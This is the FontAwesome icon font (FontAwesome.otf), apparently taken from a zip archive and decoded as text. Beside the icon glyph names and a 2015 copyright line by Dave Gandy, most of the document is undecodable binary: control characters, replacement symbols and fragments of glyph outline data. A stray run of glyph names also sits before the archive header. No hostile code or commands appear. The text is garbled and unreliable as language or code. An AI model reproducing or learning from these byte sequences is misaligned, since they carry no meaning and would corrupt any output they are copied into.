3_604uniF285uniF286_607_608_609_610_611_612_613_614_615_616_617_618_619_620_621_622_623_624_625_626_627_628_629VO�)PK!���x�x�bizone/fonts/FontAwesome.otfnu&1i�OTTO
� CFF ��R?���EPAR*��0OS/2�2zU��`cmapL.����head����6hhea
n�D$hmtxw�|�h	�maxpvP�0name'x��8post�X FontAwesomeC�������������	�U�6����U�6���-r-����k",04<>EGMT\_ehmqy}�����������������#)4>HT_lp{������������������
'4=GRYfoy��������������
&,39COVcoz������������"/5;FPUZes}���������������&+16<EOW_hmqv|����������������)04=DPX\aju����������������(,26GYhy���������������%16;>EMUckox��������������				$	5	G	V	g	l	p	v	�	�	�	�	�	�	�	�	�	�	�	�	�




&
*
-
0
3
6
9
<
?
B
F
O
_
c
u
�
�
�
�
�
�
�
�
�
�
�
�
�&5BQafmty�������������������!%)-159=AHLPTX\`dhlptx|������������������������������






%
,
3
7
;
?
C
G
K
O
V
Z
^
b
f
j
n
r
v
z
~
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�	
!%)-159=AEJNRVZ^bfjnrvz~��������������������������������
"&*.26:>BFJNRVZ^bfjnrvz~�����������������������������
"&*.2alglassmusicsearchenvelopeheartstarstar_emptyuserfilmth_largethth_listokremovezoom_inzoom_outoffsignalcogtrashhomefile_alttimeroaddownload_altdownloaduploadinboxplay_circlerepeatrefreshlist_altlockflagheadphonesvolume_offvolume_downvolume_upqrcodebarcodetagtagsbookbookmarkprintcamerafontbolditalictext_heighttext_widthalign_leftalign_centeralign_rightalign_justifylistindent_leftindent_rightfacetime_videopicturepencilmap_markeradjusttinteditsharecheckmovestep_backwardfast_backwardbackwardplaypausestopforwardfast_forwardstep_forwardejectchevron_leftchevron_rightplus_signminus_signremove_signok_signquestion_signinfo_signscreenshotremove_circleok_circleban_circlearrow_leftarrow_rightarrow_uparrow_downshare_altresize_fullresize_smallexclamation_signgiftleaffireeye_openeye_closewarning_signplanecalendarrandomcommentmagnetchevron_upchevron_downretweetshopping_cartfolder_closefolder_openresize_verticalresize_horizontalbar_charttwitter_signfacebook_signcamera_retrokeycogscommentsthumbs_up_altthumbs_down_altstar_halfheart_emptysignoutlinkedin_signpushpinexternal_linksignintrophygithub_signupload_altlemonphonecheck_emptybookmark_emptyphone_signtwitterfacebookgithubunlockcredit_cardrsshddbullhornbellcertificatehand_righthand_lefthand_uphand_downcircle_arrow_leftcircle_arrow_rightcircle_arrow_upcircle_arrow_downglobewrenchtasksfilterbriefcasefullscreennotequalinfinitylessequalgrouplinkcloudbeakercutcopypaper_clipsavesign_blankreorderulolstrikethroughunderlinetablemagictruckpinterestpinterest_signgoogle_plus_signgoogle_plusmoneycaret_downcaret_upcaret_leftcaret_rightcolumnssortsort_downsort_upenvelope_altlinkedinundolegaldashboardcomment_altcomments_altboltsitemapumbrellapastelight_bulbexchangecloud_downloadcloud_uploaduser_mdstethoscopesuitcasebell_altcoffeefoodfile_text_altbuildinghospitalambulancemedkitfighter_jetbeerh_signf0fedouble_angle_leftdouble_angle_rightdouble_angle_updouble_angle_downangle_leftangle_rightangle_upangle_downdesktoplaptoptabletmobile_phonecircle_blankquote_leftquote_rightspinnercirclereplygithub_altfolder_close_altfolder_open_altexpand_altcollapse_altsmilefrownmehgamepadkeyboardflag_altflag_checkeredterminalcodereply_allstar_half_emptylocation_arrowcropcode_forkunlink_279exclamationsuperscriptsubscript_283puzzle_piecemicrophonemicrophone_offshieldcalendar_emptyfire_extinguisherrocketmaxcdnchevron_sign_leftchevron_sign_rightchevron_sign_upchevron_sign_downhtml5css3anchorunlock_altbullseyeellipsis_horizontalellipsis_vertical_303play_signticketminus_sign_altcheck_minuslevel_uplevel_downcheck_signedit_sign_312share_signcompasscollapsecollapse_top_317eurgbpusdinrjpyrubkrwbtcfilefile_textsort_by_alphabet_329sort_by_attributessort_by_attributes_altsort_by_ordersort_by_order_alt_334_335youtube_signyoutubexingxing_signyoutube_playdropboxstackexchangeinstagramflickradnf171bitbucket_signtumblrtumblr_signlong_arrow_downlong_arrow_uplong_arrow_leftlong_arrow_rightapplewindowsandroidlinuxdribbleskypefoursquaretrellofemalemalegittipsun_366archivebugvkweiborenren_372stack_exchange_374arrow_circle_alt_left_376dot_circle_alt_378vimeo_square_380plus_square_o_382_383_384_385_386_387_388_389uniF1A0f1a1_392_393f1a4_395_396_397_398_399_400f1ab_402_403_404uniF1B1_406_407_408_409_410_411_412_413_414_415_416_417_418_419uniF1C0uniF1C1_422_423_424_425_426_427_428_429_430_431_432_433_434uniF1D0uniF1D1uniF1D2_438_439uniF1D5uniF1D6uniF1D7_443_444_445_446_447_448_449uniF1E0_451_452_453_454_455_456_457_458_459_460_461_462_463_464uniF1F0_466_467f1f3_469_470_471_472_473_474_475_476f1fc_478_479_480_481_482_483_484_485_486_487_488_489_490_491_492_493_494f210_496f212_498_499_500_501_502_503_504_505_506_507_508_509venus_511_512_513_514_515_516_517_518_519_520_521_522_523_524_525_526_527_528_529_530_531_532_533_534_535_536_537_538_539_540_541_542_543_544_545_546_547_548_549_550_551_552_553_554_555_556_557_558_559_560_561_562_563_564_565_566_567_568_569f260f261_572f263_574_575_576_577_578_579_580_581_582_583_584_585_586_587_588_589_590_591_592_593_594_595_596_597_598f27euniF280uniF281_602_603_604uniF285uniF286_607_608_609_610_611_612_613_614_615_616_617_618_619_620_621_622_623_624_625_626_627_628_629Copyright Dave Gandy 2015. All rights reserved.FontAwesome�ao���C�����������������
 %)M16=_fmqu��������������|����������:>BFRhl�����'07>Cj������Z^����)5:>CGKPTY]����			&	-	1	:	E	Q	U	\	b	h	m	�	�	�	�	�	�	�	�	�	�





)
,
;
@
G
u
y
�
�
�
�
�
�
�
�	!(0[eq��������BFR[insw~�������


"
,
1
6
>
C
H
g
�
�
�
�
�
�
�
�
�
�
�%19@GNTn����������
$)>LR^jx}����������
-9>EINSh}����������(09>CLSWdk}������������
%+39=CJPU]bipu|����������������#16DIOX_ensy���������������� %-28=BGLQ\akr}�������+
!
�T��
������fA�V����S
@?
�x
�l�f��P��������������z�z����
�c
���4�B
KH
K\�j��l
�����v��v�����o
K���
K��W
l
�'
���
�l
�
�/�@���E���X��X��E���+y}}yK�d�:+��E���X��X��E����3���3�3���3(
�`l���T~����~������
���������4�
��f�T�
@��4��
��s
�������)
��.�TO@�O�
�<���</
2A5�P
y_
V��-
��?
Gc<A
�M
��H�������U
�;
C
<
��e��8�}�yhnnh�hn���d
�(�T$E
5�n�hh
�w
�
y}�}y}}y�y}����������}y�^���w���������������� ʆ��iimdod���������$��@�~� K������z�&�w{�y�yw��}|� |�}���x�z�{�wa&z��������K������������$|��'���˒�������a�����������.
��9
�-�|�zKz||zKz�|����������K������
���f�f������������� ��~)
�T*
U
��"
Z$
�������� o�!��)
T
��
�[�=�����s
�T� ,
�}�y�Ty}}y�T��
�V�T-
�T?
�`�V�h���h�
�h�@�@�h�|�z��b����ck
���j]^��h�Y��E�֊�ׅ�B�
�����������?��G��ߩм���qٴ�̟�'(���͔��͂z���'��w�!q=�w�V�F7���HJ�?x�s�]C$�8
�8
.
3CC������
z
W
�(K$h�n.�TOa��T�0��	����������������	�tkQ��E�;�wO�V��VOcZwE�;�ɩ�L��1�������H�D
hnnh�hn����������nh���
=�
J����!�
��T�T��
�T�T}
�[
A
�;��(�=��Z�XW�G/�9�;���/�_M�knm��n9��:Y�I�Ƒ���P�`�q���������������~���d�_�i��i��i�iG�!
}.
��9
l
-�F��/�B�������i
NPuc]�T<�O��d�
}�}�|�1B&�2�B��
���7
���d
4
��,j�ԟ�!P������9�>�!���o��>��9��U��G�
��@��X
V``V}�~���d�3�f�T�w�@�t�(�s�u�w�N�5~��w�}�+�}����PV�
����qy�}��>�����r�c�rr�j��i�h�t���
�<���<�<���o��<+���
�������
�#�E��A�S� ����i�^wv�h�������v�i�^����S� �A��E�]�#���_�T@
��$�$���D
��N���$�$�V``VV`������`V�������z�z���
�3�'�)����������������x�~�D�&�l&�y�;���;Ky}�_��I�b�	\�;COLD|yz|�r����u��{������������A��0����������%�����������]�
�
�����
��]���
��!�4��~������~�4`_��`R�`e9C/R&a���žҦ�4��A�'�"�)����~�4������:
��������(�Ty�}����5�!�tV`������{
K�
�T�t�� 
�5�!��1
��t�t��k`
K9
����z���{�z�
c
���V``V��R
���R
��w���
�5�!�1
!�5�B
����z|���Q�E����Lf��eN�z�y�z����#� u��"������������=�1�?�u՗���
�
�f�f�
YY�
����
�
�Y�
�f�f7
��3����%�%���������������B
�TH
K\�TjS
�
�����r�����j
�g��
�5��
�2���l
������t�������@k
������t����������f+a
��O
��t�
�������Z�Z�r�����u��������v�vq<
�t�t�
�t�tA�TO�t�t���S
���8�
������{z�����+�<���<�<���<����
:
��
�f�fQ
2��i
�u
�@�h�B��x�������������w��B��������D�$�$�DP�!�-
�!V``V��
��;��`���L����<��� �xra�������4
��,Q��T�?�
�����������}y�vKy�x}z��y����*<��!����<�Jڔ�������s
��������
��@*
��d�P
���YYD
�*���*�*���*�*���*�*���*;�4��
�Ԛ�4�J
�4��yr�rrr�yy8��*
o
�&�����������������������c
����v�<
��.��O��8���8�
���8��;�T�N
l��$�<���<B
��3
@j��,�l"�7o�''��$��
!
�����c
����@���
��`
�!+��T����
�@�n���������������\�n��3�/�����{�V=����������������E�{�t�s�o�yx5�OI�I��gX�!�!�gX���g��!�T���}�y�T4�Tm�m))m�m�)�����������D
�YN��
�@��������l
�����S
�Z�Z�������~����3��3C����r�r�����z�{� �`����U������f�
��<�Z��������:���J,��-�����0
�hn��r�
��o7��������F�����2�y�qpV``VV`�����������{��V��v�7�+�4���0����
T��>�r�crrrr�c�r�����
�������������������
����������tp�
�
��������������yy�rrr�r�y*
�t�D�$�$�D!�5�� 
�������!��M���Q�����������:<
��0A
&�T+
�����5������������e�11e�BB�����quuqqu���;���;��uq�t����H
�t�Z���KS
{������*�}�t�/
�`
�����`���u�ttu~w�STdJ,]��շ����49��arwwvyr�/��������(DB%$�A���Ό�����������4�����
�4������������������x����Ts��
�w�rr��
����E�z�*�6�z�*E!��������������0
�D�$�$�D�_
������y�y��>�T8���;���;��'��
��:����
�y
�T�T�_���L��d��g�__gg__�g�����,l
[
��˻WL��
�����@��E�#�#�E�E�#�#�E������������~�w��]������N�TQ�����������������o"�7�l��$�>��j
s�	���P:
G�
��
���0
����������<�<������x�Gz�{y}|z!�5�������$�$���l
�c
c
������������$E�Q��j
i�p�������q��~
���1�
������������@�hc
��t�4���4�t�:���z�{���`�M���`�M��������-�t)
��&�(
y}���
��
�E�#�#�E�i
�tB
������^
ɽYM��������s�%�$���
�*1���0�B
~�v���`V��;=����@�@y�T5 !4���,$P��+�+�����0
�h���������0
���
�r������^
������w
����z��zz{���\�$�"�W�T�f
��`���S
Z�����j�
)W��b�it���
��������� }�����������hv,0������������/��v��d��p��W��
���	X	�	�
0
�
�8�F

�
�
��h\_���h3�`7c����S��g��4��^���	3U^���� V��I�M� I | �!?!�""m"�"�"�#h$$�%%�&�':'�(�)X)�**A*}+.+�+�,&,f,�,�-[-k-�.�/�00�2)2=2�2�3Y3�44G4�5�6B7C7�88H8�9s9�9�::�;5;�<=<�=�>�?�@�A�BB]B�B�GVG�G�H4H�IIIII�KKLK�M[M�N�O?OGO[O�P�Q�SSbS�TwU*U�VOV�W`WhWpW�W�W�W�XXX�YY;Z$Z�Z�[2[�\\�]&^^h^�^�_�`V`�`�aAa�a�bcc�dd�d�e$eMe~e�e�e�e�e�fffYf�f�g>gGg]guhhhziEi�j"j$j&jqj�j�kNl0l�mOmjm�n@n�oowpqqKq�q�r0r}sYs�t2t�t�u9u�vvFvwv�v�w?w�xTx�x�x�yy{y�zwz�z�{ {}{�|+|||�}%}d}�}�~�=��������������P��������7�������>�����.��������0�;�=�����1�|��������A�b�#���*�����/�+������������B��������%���V���������;�j���R�!���������B������'�?�h�����$���������:������������'���a���PÉ�ŏ��zưǙ�_ȿ�q���˟�b�́ϓ���$�)�������lա�����V׳�ء���q�0ۥ���b޼�c�G������8��]�����^��>�:��<����?���l�B�������s�H����[�N������a
�z��	�
��,�

^
�
�t>"�.�Gqsu�A1�	�A����	nA����� 3 �!�"�"�#N$[$�%F%�&&R&�&�'(
(�*;+,g-f.�/�00�0�1M33�4�55�7B7�8�9z:�:�;X=�>�?O?f?�?�@@k@�A�A�B2BpB�C[CDCE+E�E�F�GG�HXH�I�J�J�J�J�KK�L�MJM�N#N�N�N�N�N�N�N�N�N�N������T��t� �T��T���4c
�4��� �
��z���.���.Ȯ��h�K�h�<�Nh���-�����
�����-N�<vhNK�hN�<�h���.���.Nhv<�N��N�vȮ���-��|�����-�hڠ�����v�N��l
���
�4�4��
�T��4�4V``V�TS
�4�4��T?
�4�4L�����T���y�u��uyyu��u�y�����������y���?�j�`�,4�G��y�u�~�8������������գ����������YSKkj>h3c�#�
^u�i�����������ƭ��R�������l
���
�@-
�?
�������F�M�f��fM�Zn�n�w���������
���������������c
 �`�V��������c~ofa�[��Y������� �������
�T=
��
����@����s�u�w�#��$���L��>�����������$��#�����������69�JX�"�!�!`V+/E��E+�V������1�R�E
�_��_r����@3CC3��e
\
���;
�
���p�]��������� ����
�k�s����u�[��z�tg
�U������������1 ��q���9�
�[��[�9����:�Q��Q��:M�q��k�s����u�[��z�tg
�U������������1�l
��vV��l���X�X��l��V��v�6�*�3���3��6��W��)�������
�Ki�����
����l
�������
��i��4�e���
@�
 ������{
�
{
��{
�
{
\
����R
�T1���R
���`�V��V``V�TV�`���������Ԝ����T1\
����R
�T1���
�TV``V�T�
��R
���
�TV``V�T�
�TV�TV``V�T�
��
��^���y�����$�%��������'�������+
��������h�h����������j���y�����������������y����������������'���������'���+
��������������+
������������ ����
�������t�tB
KH
�t�tH
K\�t�t�
�j�t�t����=
�
 ������������H
K\��j��=
�
����������n
����t�W�&S�:�aR`S�:�a�)�)�6�
���z���6�)��õ��`�a�;�R`�W�&��t���P�;���;����Q�EEQQE�E�Qь������
���S����������T��T����@�k���m�����z��K���}�z�����������������a�E�V������������" n�m�l�o�L��{�y�ry}{�{O�J�Nl�l~n|�������i��&js�����������^�^�[{m~m�k�No|�y|�rz�{���Kp�i�j�ki\f_i]�����������Q�M�[�����������!��|�����Lz��~��r������Ǒ̒Ȫ���������������'������������f�g�i��������M��������������
�����
�����
�����
��([po����p���H��H�4��h �
��l
���������n��n�����t,��
������s������~��o�J�,l�W���`a�G�ah�c��~��v�~�A�������������H���H�����������������������F!�4��t����4�t��t�
�4�#
�)���{�||��||���������N��
�������g���|��5����p�p��
��Ty�~}y�:y~�����T����ppur��5��|g�ccn�_��Tz}������������
���y�}}z�T���� ����T��d��gf[wXX[��f���e��?
��
��t�q���T�%
�T����
�T�T�
�T�T��������������l��T~����~������
���������8
���6����(���������������������������'
��T�����T�������6k����,�T��,�T���������h���X�h���������Ym���}������}c�h��hcqj}����}i�Vg�v�W�
����w�����x�r�w�wvt�t�v���������������������#
���c
�w�����!�S�Y�;���;�P�y�l�D�&�������������������)�'C�3�
��Y4�����#
�T[
�
�t�}���|��}�zcesd�,.�9/�F����-���
.
�T4
�T������"�Q>�W���������������������"�S�X�������5����z�|��[������������,�9�F��Z3���}
�T[
�_
�������"
��"��"�
�T�����������@��Ա
��Q
�������@3CC3��e
����T���T����T�
�T��+�
k�T���^�^�����^�^���Tk�����wh
]�b�t�\�j�������K__�=��1ln��o����1�"�-SK�q~n}s{x}zs�z:
�������;�3�n� �L��������� ��T���
��T���/���W�W���/��!�(�Z�Mj���:�kB��P
K*
k+8V=_G�xɁ��������������H�KxMG�_8�+��
������M����������e
�����e
����N�-������hnog?���
�
��?g�o���������� ��������e
����N�-������hnog?���
�
��?g�o�������������_��Q�P��o�x��}��y�C���Q�(Csyrp}t{xod�������P��Q�_����K�����
��n�{�}�������|�z�x�8�
�S�`�`*�S�8�
qxozo||�{�}�s}|{n:
��������
�K���������������
���������������������
����
���������
������������;������x�����
�����������ʪ�ʪ����ꪫ����������ʪ��骫����k��i�hvv�v�i��j�i����ʌ�����q�����|�����1|���w������|�����|�����|������1|
g�����1|
�����|
�����|
�����|
�����Q�
kl�lq����ʁ
����q�������i��j�ivv�v�i��i�j����p
�)p
��8�_�^�X*�D�t��cX��_�^�s�jii}jtt�j�jh��s����������, ����g��|�v�t��y�w�x���og�`vf�/TF��w�����������������.��������q��ra�\��zz��z������aM{tsw�x�y�z�z�Vc,sj|wu��t�{�t�v�\h2p]�yx}�x�z�u�x�Wi:mY{pvz�s��~�{�s�w�w}e�_�^#��:��/�����������r�����8��������u
 ����������������4S
�4���K�
�4�"K���m�e��,�,�eB�V�4���K"44"�4\�t�4��T?
�4�t���*
�T���3���3�3���3�3���3�3���3�T�4�tX��r=�E��E=UIrX��t`
��(
l
P����T��,
 ���i�e��%�/��,�xx�x((��(���#�Ɏ���������	w�����������R��'������V��b���gfV�p��o�q�qq�������{����������\�/�j�}�}���Y�h�^�?�DF�G@�E�a�t������V@���h����a�%�-n�<���s��c���������sŔ�O��������5���*��V�JM���(0�x[[��_}�~������������%����������;�AH�W�{�'Q�bgf��g���
��F�I��G���������f�=��R��!��G������v�^]�^����z����8����'��n�\��PuH�#hPMqJ�K{�-�����������Њ�����xġ���������M�M�N�������[�����������Đơ�ϦԖУ�������!!�!�����x$ǁΓ�mr�;�n�i~G�h�ftnOlF�Kwz6����������;�������p��6p�_�ph��6hp�o���;_}oh���6�h������6��}�_�����Ǐ��\����������|��}�Cy�	�^��^�^L���uZ����������������������q�����<
���R
ept�c��CD�C��
���������ǐ��]����������|��z��b|�|}3��mrS��6��6��7W��,��������
�"�����������������<
���R
~yv}u�����������
��]� y�����]h��vp|�zww�z�v�����{����y{ ��������������|��p��hy
��'
�9
�-���'
�9
c
-��'
��9
�
[
y
��'
�9
�-����t��'
�9
�[
y
��.
�9
�-��.
�9
c
-��.
��9
�
[
y
��E��E��E�������t�
���
����@�������\
��tX�������������������������=l
�TX
\
��T���:
���������H
��k
�u�����������tX
�
��{�t������z{�~�'�&�9+
�T'�T&
�T&�:�'�'�
�)������T�G����4�4�����4�4����Tl
�
��|z�@�
�g����4k����a�@�
@�
���� �x�����D����������������~��������������������~U�T����4�4��������8��~�sj�iij}st�:�9�4�4�:�:�,�����������m���M�
N�L�T���_��p����������’����t���H������ 
������@���M
���������Ϡ������������H�G�w�w�sr@��
�m�X�X�j��:���b�kkcv`~:���j��X;�Y;l-&@���y�y���L
�_
�������S�+����,�,������|�������|�������������������������~���KK�������.
����������������������������fc�c��L
+�4�4�4�����4�4�0�0����f��,�,f�M�ff//������ ����g���l
�������}���{|y~w������j�.
������������������|�z����@"��L
�������
�{�z�����t�{tq�T�4� 7����\�3�u������������������l�z��*���� ��p�4�Tq�t��������������
 ���
��l
����������������KK��������.
��������������� ���������������fc�c��L
�{������k���k�Y�kk������k�Y�kk��kk�Y�k�B�B�k�������������
����
������
����}
��������0
������`�
.
���
���`�
�����gs�
��E�����f�Z�E�
�Z� �S�f�Z�E�Z�Z��Z�Z�r����Z����h������l���vl�r|h�@h�|��kc
@_�����G��_�����[
kc
@�
 ����	
�Z�C
�Z�Z��Z�Zr�w�h�Z�
�c
�����	
�Z�C
�
�Z�
��������
�@�C
�}����rr�w��_����r�Z�Z���
���w��.������:�:�z�z��z�z�r�����:�:�������������'��z�z�:�:�����������:�:�
�z�z�������J����b
���$����Z
�����!
���� 
�������J��hn����~���� 
k}�2z�z11z������I�I�I�I{�zzz��1�����������I�I�I�I��������������������I�I�I�I���������1��zzz�{�I�I�I�I��{z��v 
���������z�z{z�����������������&�v�v�,�+�&�1��zz���6�
k��4y}}y�Te�TN
�T���4�,#Q?`\pnZt��
����ҫȧ����P�Kgjzx}wy\O������������~������#��7�@�T��K��T 
k���4<
�T.�4O��+.�4O��8���C
�4���
�4��
�4��4 
������`�$���$`��
��$���`�$��{
���$���$��w
��$`����$�9
���
�#Z�k�=�=�k��#�
�#�kZ�=�=Z�k�#9
�#��k�=�=�kZ�#w
�#�k��=�=��k�#[
�
��]�
�����
�&�&�
�����
�&�&�
�����
�&�&�
�����
�&�&�k�K#
�
��g�%������'�'%%������
�:�:�!8#
�
 ���������%��5�����6�&��{��S�j�����������jQ��h�[�=���<�<���=�>���o��>���n
�^�C�T����������}�s�@��sk�iij}ss��t�Dj�t�� ��
��������}�s������TӸ��������~�s����sj�iik}ss@@st��
j�t�����TC^OG�G�O��T����s�Dj�s�@t���
��������� �K���8���sj�iij~st��s�Dk�s�@s���������TC�^���Ǹ��T����s����������� �K�T�8@��sj�iij}tt�����T���
�T�����tj�iij}tsA@s�Dj�t�� t������ �,���j��l�����
���t��,Q��a!���� �K��t�k�v��������������������q���C�t��������
k���t
���������Ԅ����
k���
�<���<�<���o��<+��!y}|z�Ty|���R�����T��|y��.}�|�y�Mx|��z������������p������������������4�Hhnzh�Thn����h�T��T�hS�\��V`��Z��y~���5���V``V�V��5�������`V���Q�L����'�HMoZd��9��9�dM�H�''��Q�L*
��$�4���?
�4�D
\
������/J�7�I[^_[Z_~}�yhn����������{�x�(���!
���Z�f���7p\XT���H�aG��-���w��h�h�i�w�V�Q�Z:#v���z]��l���`���L{�l��{��,�+������\�^���˒���l
�4B
��H
K\@j�������C��������N�.E���Ti����C�������k�h����T����T�$������?���L������L���?�V
���]�]��
�v�c��0;���'�d�quuq�--��3��������L��a������a��Lv�trr�t�v��L��a������`��L�������T�$���]�D�'�#�5�V
�#��7���quuq�-.��3���S������v-�y����U*�PN�O���_��Z~w�rsr�s�w��H�7�*�V3�ziU{������Q��������g�
�e��g�
�������S����������A��:�N�T����~�=�����L��=�&��0�����E��rA�������u�X�����������\
���5y}|��y}���R����|y�R��
~�|�y�Mx|��z�]�����������p����������k�o�u`�\\`qbu����ud�[�dd��s�c
���������u����z``K�4K++�4�4�-�3����������������������������V��������+*���������������Q�Q�������������u�듔����V�V�������������������������땓�����4�L�5�5���4K� �����˫��4�4��˫��x�m��k
�4�������������4��m�T�t�k
�T�t�k
�T�t�m�4�������4��K����
�Q
���t��������4��k
��m���t�K����
�Q
�������o
K���
K��W
l
�\
�.���"&��F�t4�t�+�
�
��������������+K�
�
Qc-b.T5���M�K����Tz�|������������sRrQnS�SL0��t4�t��������ĤŨ��������Ty�}��
����%�������%�����_��I�b�	\�;COLD|yz|�r�����s�{���������A��0����������%����kc
�T�
�K�i�``�i��K��
�,����Q�Q����,����_�O
�,�����_�O
�,����L��a����r��z�y�z�yrr�b�r�:�9�r�������������
�:�9��L��l����r��:�9���������:�9rr�b�r�z�y�
�z�y�)�`�����������4�T��������TG��������y�xxy�}�����||�9�T�4�4r�d��Tj��4_�T�4�4���f�TH
������4�T��������T@
|�|����}���������������� ��������Q�EEQQEE�Qь��Q�EEQQEE�Q�@����_�O����H����`�E��{l^@l�9���
�,������������������ ����4�K
�4�
��&�����)�WW���X�g��3�
UGQ�� {y|ss^������
����� ��������K
���
�������� ��/�����`�T��l������
����}
����

������`�
.
����[
���
���������`�
�
���
���������������������������������
�����������2o`gfbn��������h������.���������/�>�p�����������+�>�������|����R�i���������/8�C�����������rb�������{Zja_q���������V ���
���
�P��_
���4��4�T(
V``V���
N
�t�Y
�����c
�����
���������T������
����s
�^
��nc
�
���T��T����1
no��q�q�on�1
!5� 
����������
��T�����f������t//tq�:�v++��������n�+�*�m�����m�*�+�n������3�3�+
����y��p�p��v��-�����)�
����m����ERQDEQ��6
��ERQDEQ�Ҍ���QE��9���}��,����~��������������
�q������������
2s�r�q�t�-��}�}�N}�}�~Z�T�Yp�r�r~�������n��
pw�����������e�f�c~r�r�q�/s~��|~�M}�~���,s�o�p�pndmfne�����n�
 �s�����������
�������-}�����N����������������1��������������������k�m�o��������/���������D�D\
l
������y��[
�
���p�6��$�7�������d��I�.�3���T���fo1\��s�\k�
�<^��
�
�����U/�Sk����?Ÿ��������j�-����@�	�
+6�	��@
�D�ɝ��·�l��Z'�#ik}ts')��2OKebh`i_�mdG1dq��^
��n����m��]��a�"����.����������������������e��
�G�.�3������GNOH���	�6�
�	t@�K̬�-*�o�s�r��^��?<k���篞������
���Y�	�x�x�y�t�R]�s�sv�k�c\k}\vs򺊧1f����z�k��������~�r�������v�d���O����J��.�eY�$�n:mo��^
��n���q�1�d�_�`�c�Jl�2�)t��}�����Ǐ���y�m��D��
�	����������g
��
��@�K�M�>����������M�>�K���R�4�)�<�5M��n����ɿ�<�5�)�4�RP����
���p�]����������;
 �����d�r��3C���T�
���~ϧX��'�T&
���~ϧ�4���
����{��{���{������J�{�J�� IYU:��=Y��Ͽ��ڼWG��� ��j�8Ke`bz�|�vw��{���	�̋�{&������,�(�i�"���z �����4�t�4���ToN
�T�4���8��0�����Q�E�EQQEE�Q������0�8:
�(�y{���������������w�A[
�_
�
�l
��&
��.
�T/�TL
��_��@
��D�D� � D
��N� � �D�D��l
����
���+
��^�Gof�������C3�Tz
��^�Go�
���
 ��������^�!�Y������1���/���)���Yb���1��+���
���o
�Թ��V``V��R�z�f��|�X�m�}�[�YKKkK+++K+K$��>��+�++k��˙����������̚�z�f�R��_���L��<����L������������������������ a��������������������������N��������������������������i��������������������������������������������`������ʆ�������������� ����ŕ�������������������������X�P+
!
�t�������]�r[����t��
 ���˺�?ApDU8��8D��p�?��?
��\�p�T�T�z�{{z�~�T�T�#
���T�~
�T���p
����!���8���Z���Z���.n8��2����Y\uZHm{������(�r�������^�-Ʒ֫Ϧ�������[������������{�wx^�^]U�p�[�c��\��ˀ�t�����������b�de�e�	�����$fb%�<l6fGW���G4���9�<:]ua\H,�2�������n��������{����l
���������Z�w�R�Q�S��qk�lN2�IUph��s�J��&�J}�r����I���m�{�j�l�kā�u�v������gE{|jZvkSr^kPxOH.�7�6�N�P�T�>�a�a�>"�i�p�ul��e��Ǟ����ë�����ѯ�����
���w��C3��.
�����4+
��t
���3��&
���
����
��
�w�&�;�*2�26�;�*����u
����qX�sIm�[FHN��M�o����;�ot�p��л�ͩ�������������&�o�x�tt_�Jdw�r�y��0�A���y������u���{�&A�y���������  �(T��QrLyJ�γ�ʣ�MfEpB}�P7�.�G�$�%�Fr�r�s�������3�Xo[{TO��(�QV�Y�`������1���(m�pn�nvw��w���.�"�4��X�+pr��q/�#�>V�K�����?�����ʹ�ķ������S��p.���v�/����n�������������������Q���1����h����/
��p����%��������]8rw�s�����p���� ���T���T��T���]�]��T�T�4���V+�T�
��,�[
�)��������
�j
�@�
@���
���@�Q
�t���t�f
��g�����
� ���������
����T�G���z�i.�]�,�+�+�,�]�i�����{{���}�zy�j�p����n�������j��r����������������y��'�����������'������{{�~�{y�#j�o����i�c�c���i��q��#����������������4�4�������V���V��4��@��Ա
��Q
���2�t�1�v���������~z��1�v�F�4������Y���tH�A��AHZEt�Y���r�tp�Ԋ
��
�c
������4�T��t��tf�T�
�E�u�F�F�6����!�1��=۴�����n���_�F�(���
�R�D������\�����������������\��
���T����$�4�`
��.���G�^������S������S�����G�^�J�(��@�t�w�T�3�f����X
V``V}�~���d�3�f�T�w�@�t�(�E�Q��T�!��y�T�k`�����������w�r��P���N����x�y�p�r��NV[�P��w�r�q�q�yx����y�p�r�r�ww�r[�P�N�r�p�yxxy�p�r��N�P[r�ww�r�r�p�y����xy�p�r�r�w���P[V�N�r�p�y�x�����N���P�r�w������������}�����������������P�NV������������V�N�P�����������x��_
���4���.������T�O
�l
��FPPF���s�\k�
�>\��V�?��Ck��������������������������k+�+JL��@
�
������=��3�`�?.Qm\ibgbjnG5[��^
��n����fu�e�l��.�������=� ��	� �_
���.�G�c��4����`���C�>��[�B��
������a�tĹ������i�x���������FP����������+��֫ঽ�t��t�t�u�V�]�]B��1�������
���s
��[G�ng�i�m��Q`�?��3�4�=_�`�b�
��
�	�� ��	� �=�a�c�f��}�|}K�K�Y����S��#�L�����������
�"�K�
���V��?�Ck���1�B�]�]�V�v�u�u�t����������+����������PF���������xi������Թ�ta�������
�?����M���Q��YK�K}|��}f�c�a��=� �	�� ��	�
��
�b`�_�=4��3��?`�Q�m�i�gجn�G[����w
��
��ʰ�����"l
���ZB�
�xx��yatRt]ss��vikcx\j_��q���FPPFGO����LJ+�+k�����������������������k��C��>�[����J
G�!
�����k�f�u�f�����s
�^
��[5Gjnbgbi\m.Q�?`��3��<������
��	�
�� �	�� ��=������؉�����ˠ�����S���L�������@��J���Q�Q���{z@�r00�6����0��
�����
��{zz�{�Q�Q����W
� 
����������00������T���������Q�Q���{���Q�Q�
��%�����0��{z��%
����00{������Q�Q��b
���Q�Q�T��������������
������{z����
��������00�y
�����
��&�Q�Q��d
���Q�Q�
��{z����
����E��݂���������v�������
�<���<�<���o��<+��������������~��������������|iyz���r|���������x|��~t��}�uz��������������������������~�}����t���yzr����j����hv�������������~|������{���|����������������~�oz|������������������r}s�pw�h����������������������jh�y�~�|��������������������}}��|x}�o���w������u����x�����������z�����p���}�o�~�v���q�y���v�}��}�{�o�����������y�~�t�����c�����u����������������y�u�u~�������x�����������r���}�������|�~���g���w������������ɛ����������|����������������c���������x|�����������������������|����������������������������������v�����������������������������t���|�������$���|����~����������������d����������@����|������~��������v���r����y��������s~��@���uw�}�{�~|����|��}}x�z���ut�����������������l���������@�����|���������~���|�r����������������������k��������|�����������������������|}�����y����������������������~���������z�{�������|������}�{����x����|�����sv��~�v�z�y�z�z����������y���������7�����������������������������������������������������������}�r~�����������w�������������������������w������������/*�G�s �i��a
��8��"�W��=�=s�Dj�t����
�>�>��G��ww�|�&xj�U��t���=�����������N,�B��Q�?��F��������������������E
����������
���
���
�{���t�q���
�����z����
�z�������������
�������w�������4�4@
���
�4�4�t�e
���t���������������a�k�w�$�$������������Ti
�Tqt{s��t�o�y�$�$���������$�$��������t�q�T4
�T�A
